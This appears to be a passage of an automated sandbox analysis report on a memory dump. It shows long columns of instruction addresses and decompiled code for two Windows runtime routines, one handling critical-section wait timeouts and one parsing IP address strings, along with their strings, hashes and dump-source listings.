                                                                                                                                                                                                          0x020d536b
                                                                                                                                                                                                          0x020d5372
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x02112363
                                                                                                                                                                                                          0x02112363
                                                                                                                                                                                                          0x02112369
                                                                                                                                                                                                          0x0211236a
                                                                                                                                                                                                          0x0211236c
                                                                                                                                                                                                          0x02112371
                                                                                                                                                                                                          0x02112373
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x02112379
                                                                                                                                                                                                          0x02112379
                                                                                                                                                                                                          0x0211237a
                                                                                                                                                                                                          0x0211237f
                                                                                                                                                                                                          0x0211237f
                                                                                                                                                                                                          0x02112385
                                                                                                                                                                                                          0x02112386
                                                                                                                                                                                                          0x02112389
                                                                                                                                                                                                          0x0211238e
                                                                                                                                                                                                          0x02112390
                                                                                                                                                                                                          0x020d5378
                                                                                                                                                                                                          0x020d537c
                                                                                                                                                                                                          0x02112396
                                                                                                                                                                                                          0x02112396
                                                                                                                                                                                                          0x02112397
                                                                                                                                                                                                          0x0211239c
                                                                                                                                                                                                          0x021123a2
                                                                                                                                                                                                          0x021123a3
                                                                                                                                                                                                          0x021123a6
                                                                                                                                                                                                          0x021123ab
                                                                                                                                                                                                          0x021123ad
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x021123b3
                                                                                                                                                                                                          0x021123b3
                                                                                                                                                                                                          0x021123b4
                                                                                                                                                                                                          0x021123b9
                                                                                                                                                                                                          0x021123ba
                                                                                                                                                                                                          0x021123ba
                                                                                                                                                                                                          0x021123bc
                                                                                                                                                                                                          0x021123bf
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x02109153
                                                                                                                                                                                                          0x02109158
                                                                                                                                                                                                          0x0210915a
                                                                                                                                                                                                          0x0210915e
                                                                                                                                                                                                          0x02109160
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x02109166
                                                                                                                                                                                                          0x02109166
                                                                                                                                                                                                          0x02109171
                                                                                                                                                                                                          0x02109176
                                                                                                                                                                                                          0x02109176
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x02109160
                                                                                                                                                                                                          0x021123c6
                                                                                                                                                                                                          0x021123cb
                                                                                                                                                                                                          0x021123ce
                                                                                                                                                                                                          0x021123d7
                                                                                                                                                                                                          0x021123d7
                                                                                                                                                                                                          0x021123ad
                                                                                                                                                                                                          0x02112390
                                                                                                                                                                                                          0x02112373
                                                                                                                                                                                                          0x0211233f
                                                                                                                                                                                                          0x0211233f
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0211233f
                                                                                                                                                                                                          0x02112291
                                                                                                                                                                                                          0x02112291
                                                                                                                                                                                                          0x02112293
                                                                                                                                                                                                          0x02112295
                                                                                                                                                                                                          0x0211229a
                                                                                                                                                                                                          0x021122a1
                                                                                                                                                                                                          0x021122a3
                                                                                                                                                                                                          0x021122a7
                                                                                                                                                                                                          0x021122a9
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x021122ab
                                                                                                                                                                                                          0x021122ad
                                                                                                                                                                                                          0x021122af
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x021122af
                                                                                                                                                                                                          0x021122b1
                                                                                                                                                                                                          0x021122b4
                                                                                                                                                                                                          0x021122b4
                                                                                                                                                                                                          0x021122b6
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x021122b6
                                                                                                                                                                                                          0x0211228f
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0211226d
                                                                                                                                                                                                          0x020d53cb
                                                                                                                                                                                                          0x020d53ce
                                                                                                                                                                                                          0x020d53d0
                                                                                                                                                                                                          0x020d53d4
                                                                                                                                                                                                          0x020d53d6
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020d53d8
                                                                                                                                                                                                          0x020d53e3
                                                                                                                                                                                                          0x020d53ea
                                                                                                                                                                                                          0x020d53ea
                                                                                                                                                                                                          0x020d53d6
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 021122F4
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 021122FC
                                                                                                                                                                                                          • RTL: Resource at %p, xrefs: 0211230B
                                                                                                                                                                                                          • RTL: Re-Waiting, xrefs: 02112328
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2376022456.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376017076.0000000002090000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376136233.0000000002180000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376141520.0000000002190000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376146433.0000000002194000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376150887.0000000002197000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376156087.00000000021A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376198013.0000000002200000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                                          • API String ID: 885266447-871070163
                                                                                                                                                                                                          • Opcode ID: 1f2f194b370980d11dd94a55348ed10d74dcbcd5251b638d7b407212637080ab
                                                                                                                                                                                                          • Instruction ID: e5d503eeaff2d5d2c48a5febbbce7a3080bdf8ba6336ffb9e1787967dded85a5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f2f194b370980d11dd94a55348ed10d74dcbcd5251b638d7b407212637080ab
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 235108716417126BEB15DB28CCC0FE77799EF48324F104229FD15DB680EB71E8419BA0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 020DEC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 51%
                                                                                                                                                                                                          			E020DEC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E020CDA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0x219793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E020B16C0(_t39);
				} else {
					_t40 = E020AF9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E020F3915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E020B01A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0x219793c; // 0x0
								_push(_t85);
								_t44 = E020B1F28(_t71);
							} else {
								_t44 = E020AF8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E020F3915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E02132306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E020DEC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E020F4FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E02103F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E02103F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0x21920c0;
								if(_t85 != 0x21920c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E0213217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E02103F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

































                                                                                                                                                                                                          0x020dec56
                                                                                                                                                                                                          0x020dec56
                                                                                                                                                                                                          0x020dec56
                                                                                                                                                                                                          0x020dec5c
                                                                                                                                                                                                          0x020dec64
                                                                                                                                                                                                          0x021123e6
                                                                                                                                                                                                          0x021123eb
                                                                                                                                                                                                          0x021123eb
                                                                                                                                                                                                          0x020dec6a
                                                                                                                                                                                                          0x020dec6c
                                                                                                                                                                                                          0x020dec6f
                                                                                                                                                                                                          0x021123f3
                                                                                                                                                                                                          0x021123f8
                                                                                                                                                                                                          0x021123fa
                                                                                                                                                                                                          0x021123fc
                                                                                                                                                                                                          0x020dec75
                                                                                                                                                                                                          0x020dec76
                                                                                                                                                                                                          0x020dec76
                                                                                                                                                                                                          0x020dec7b
                                                                                                                                                                                                          0x020dec7c
                                                                                                                                                                                                          0x020dec7e
                                                                                                                                                                                                          0x02112406
                                                                                                                                                                                                          0x02112407
                                                                                                                                                                                                          0x0211240c
                                                                                                                                                                                                          0x0211240d
                                                                                                                                                                                                          0x0211240d
                                                                                                                                                                                                          0x0211240d
                                                                                                                                                                                                          0x02112414
                                                                                                                                                                                                          0x02112417
                                                                                                                                                                                                          0x0211241e
                                                                                                                                                                                                          0x02112435
                                                                                                                                                                                                          0x02112438
                                                                                                                                                                                                          0x0211243c
                                                                                                                                                                                                          0x0211243f
                                                                                                                                                                                                          0x02112442
                                                                                                                                                                                                          0x02112443
                                                                                                                                                                                                          0x02112446
                                                                                                                                                                                                          0x02112449
                                                                                                                                                                                                          0x02112453
                                                                                                                                                                                                          0x02112455
                                                                                                                                                                                                          0x0211245b
                                                                                                                                                                                                          0x0211245b
                                                                                                                                                                                                          0x020deb99
                                                                                                                                                                                                          0x020deb99
                                                                                                                                                                                                          0x020deb9c
                                                                                                                                                                                                          0x020deb9d
                                                                                                                                                                                                          0x020deb9f
                                                                                                                                                                                                          0x020deba2
                                                                                                                                                                                                          0x02112465
                                                                                                                                                                                                          0x0211246b
                                                                                                                                                                                                          0x0211246d
                                                                                                                                                                                                          0x020deba8
                                                                                                                                                                                                          0x020deba9
                                                                                                                                                                                                          0x020deba9
                                                                                                                                                                                                          0x020debae
                                                                                                                                                                                                          0x020debb3
                                                                                                                                                                                                          0x020debb9
                                                                                                                                                                                                          0x020debbb
                                                                                                                                                                                                          0x02112513
                                                                                                                                                                                                          0x02112514
                                                                                                                                                                                                          0x02112519
                                                                                                                                                                                                          0x0211251b
                                                                                                                                                                                                          0x020dec2a
                                                                                                                                                                                                          0x020dec2d
                                                                                                                                                                                                          0x020dec33
                                                                                                                                                                                                          0x020dec36
                                                                                                                                                                                                          0x020dec3a
                                                                                                                                                                                                          0x020dec3e
                                                                                                                                                                                                          0x020dec40
                                                                                                                                                                                                          0x020dec47
                                                                                                                                                                                                          0x020dec47
                                                                                                                                                                                                          0x020dec40
                                                                                                                                                                                                          0x020b22c6
                                                                                                                                                                                                          0x020debc1
                                                                                                                                                                                                          0x020debc1
                                                                                                                                                                                                          0x020debc5
                                                                                                                                                                                                          0x020dec9a
                                                                                                                                                                                                          0x020dec9a
                                                                                                                                                                                                          0x020debd6
                                                                                                                                                                                                          0x020debd6
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020debbb
                                                                                                                                                                                                          0x02112477
                                                                                                                                                                                                          0x0211247c
                                                                                                                                                                                                          0x02112486
                                                                                                                                                                                                          0x0211248b
                                                                                                                                                                                                          0x02112496
                                                                                                                                                                                                          0x0211249b
                                                                                                                                                                                                          0x0211249d
                                                                                                                                                                                                          0x021124a0
                                                                                                                                                                                                          0x021124a3
                                                                                                                                                                                                          0x021124aa
                                                                                                                                                                                                          0x021124aa
                                                                                                                                                                                                          0x021124a5
                                                                                                                                                                                                          0x021124a5
                                                                                                                                                                                                          0x021124a5
                                                                                                                                                                                                          0x021124ac
                                                                                                                                                                                                          0x021124af
                                                                                                                                                                                                          0x021124b0
                                                                                                                                                                                                          0x021124b3
                                                                                                                                                                                                          0x021124b9
                                                                                                                                                                                                          0x021124ba
                                                                                                                                                                                                          0x021124bb
                                                                                                                                                                                                          0x021124c6
                                                                                                                                                                                                          0x021124cb
                                                                                                                                                                                                          0x021124cd
                                                                                                                                                                                                          0x021124d0
                                                                                                                                                                                                          0x021124d1
                                                                                                                                                                                                          0x021124d4
                                                                                                                                                                                                          0x021124d6
                                                                                                                                                                                                          0x021124d9
                                                                                                                                                                                                          0x021124d9
                                                                                                                                                                                                          0x021124dc
                                                                                                                                                                                                          0x021124df
                                                                                                                                                                                                          0x021124e1
                                                                                                                                                                                                          0x021124e7
                                                                                                                                                                                                          0x021124e9
                                                                                                                                                                                                          0x021124ec
                                                                                                                                                                                                          0x021124ef
                                                                                                                                                                                                          0x021124f2
                                                                                                                                                                                                          0x021124f2
                                                                                                                                                                                                          0x021124ef
                                                                                                                                                                                                          0x021124e7
                                                                                                                                                                                                          0x021124fa
                                                                                                                                                                                                          0x021124ff
                                                                                                                                                                                                          0x02112501
                                                                                                                                                                                                          0x02112503
                                                                                                                                                                                                          0x02112506
                                                                                                                                                                                                          0x0211250b
                                                                                                                                                                                                          0x020deb8c
                                                                                                                                                                                                          0x020deb93
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020deb93
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020deb99
                                                                                                                                                                                                          0x020dec85
                                                                                                                                                                                                          0x020dec85
                                                                                                                                                                                                          0x020dec85
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0211248D
                                                                                                                                                                                                          • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 021124BD
                                                                                                                                                                                                          • RTL: Re-Waiting, xrefs: 021124FA
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2376022456.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376017076.0000000002090000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376136233.0000000002180000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376141520.0000000002190000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376146433.0000000002194000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376150887.0000000002197000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376156087.00000000021A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376198013.0000000002200000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                                                                                                                                                                          • API String ID: 0-3177188983
                                                                                                                                                                                                          • Opcode ID: 0fcceab1695c2fd2acbcf40e103df6bddd3f48d671057ae72225ab7657853774
                                                                                                                                                                                                          • Instruction ID: cc5c3fb0341172c0ad6620dfacc2f767621e59453ecf592d90c3eb90ae6dec62
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0fcceab1695c2fd2acbcf40e103df6bddd3f48d671057ae72225ab7657853774
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9941D570640314AFD724DB68CC89FAB77BAEF44320F208A15FA699B6C1D734E941DB61
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 020EFCC9, Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E020EFCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E020EEE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E020EEE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E020E685D(_t167, 4) == 0) {
								if(E020E685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E020E685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E020E685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E020C8980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E020BDFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E020EEE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E020EEE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

























                                                                                                                                                                                                          0x020efcd1
                                                                                                                                                                                                          0x020efcd6
                                                                                                                                                                                                          0x020efcd9
                                                                                                                                                                                                          0x020efcdc
                                                                                                                                                                                                          0x020efcdf
                                                                                                                                                                                                          0x020efce2
                                                                                                                                                                                                          0x020efce5
                                                                                                                                                                                                          0x020efce8
                                                                                                                                                                                                          0x020efceb
                                                                                                                                                                                                          0x020efced
                                                                                                                                                                                                          0x020efced
                                                                                                                                                                                                          0x020efcf3
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020efcfc
                                                                                                                                                                                                          0x020efcfe
                                                                                                                                                                                                          0x020efdc1
                                                                                                                                                                                                          0x0211ecbd
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0211eccc
                                                                                                                                                                                                          0x0211eccc
                                                                                                                                                                                                          0x0211ecd2
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0211ecdf
                                                                                                                                                                                                          0x0211ece0
                                                                                                                                                                                                          0x0211ece4
                                                                                                                                                                                                          0x0211eceb
                                                                                                                                                                                                          0x0211ecee
                                                                                                                                                                                                          0x0211eca8
                                                                                                                                                                                                          0x0211eca8
                                                                                                                                                                                                          0x0211ecaa
                                                                                                                                                                                                          0x020efd76
                                                                                                                                                                                                          0x020efd79
                                                                                                                                                                                                          0x020efdb4
                                                                                                                                                                                                          0x020efdb5
                                                                                                                                                                                                          0x020efdb6
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020efdb6
                                                                                                                                                                                                          0x020efd7e
                                                                                                                                                                                                          0x0211ecfc
                                                                                                                                                                                                          0x020efe2f
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020efe2f
                                                                                                                                                                                                          0x0211ed08
                                                                                                                                                                                                          0x0211ed0f
                                                                                                                                                                                                          0x0211ed17
                                                                                                                                                                                                          0x0211ed1b
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0211ed1b
                                                                                                                                                                                                          0x020efd88
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020efd94
                                                                                                                                                                                                          0x020efd99
                                                                                                                                                                                                          0x020efda1
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020efdb0
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020efdb0
                                                                                                                                                                                                          0x0211ecbd
                                                                                                                                                                                                          0x020efdc7
                                                                                                                                                                                                          0x020efdcb
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020efdd7
                                                                                                                                                                                                          0x020efde3
                                                                                                                                                                                                          0x020efe06
                                                                                                                                                                                                          0x02101fe7
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x02101fef
                                                                                                                                                                                                          0x02101ff0
                                                                                                                                                                                                          0x02101ff4
                                                                                                                                                                                                          0x02101ff7
                                                                                                                                                                                                          0x02101ffa
                                                                                                                                                                                                          0x02101ffd
                                                                                                                                                                                                          0x02102000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0211ecf1
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0211ecf1
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020efe06
                                                                                                                                                                                                          0x020efde8
                                                                                                                                                                                                          0x020efdec
                                                                                                                                                                                                          0x020efdef
                                                                                                                                                                                                          0x020efdf2
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020efdf2
                                                                                                                                                                                                          0x020efdcb
                                                                                                                                                                                                          0x020efd04
                                                                                                                                                                                                          0x020efd05
                                                                                                                                                                                                          0x0211ec67
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0211ec6f
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0211ec6f
                                                                                                                                                                                                          0x020efd13
                                                                                                                                                                                                          0x020efd3c
                                                                                                                                                                                                          0x020efd40
                                                                                                                                                                                                          0x0211ec75
                                                                                                                                                                                                          0x0211ec7a
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0211ec8a
                                                                                                                                                                                                          0x0211ec8a
                                                                                                                                                                                                          0x0211ec90
                                                                                                                                                                                                          0x0211ecb2
                                                                                                                                                                                                          0x020efd73
                                                                                                                                                                                                          0x020efd73
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020efd73
                                                                                                                                                                                                          0x0211ec95
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0211eca1
                                                                                                                                                                                                          0x0211eca4
                                                                                                                                                                                                          0x0211eca5
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0211eca5
                                                                                                                                                                                                          0x0211ec7a
                                                                                                                                                                                                          0x020efd4a
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020efd6e
                                                                                                                                                                                                          0x020efd6e
                                                                                                                                                                                                          0x020efd71
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020efd71
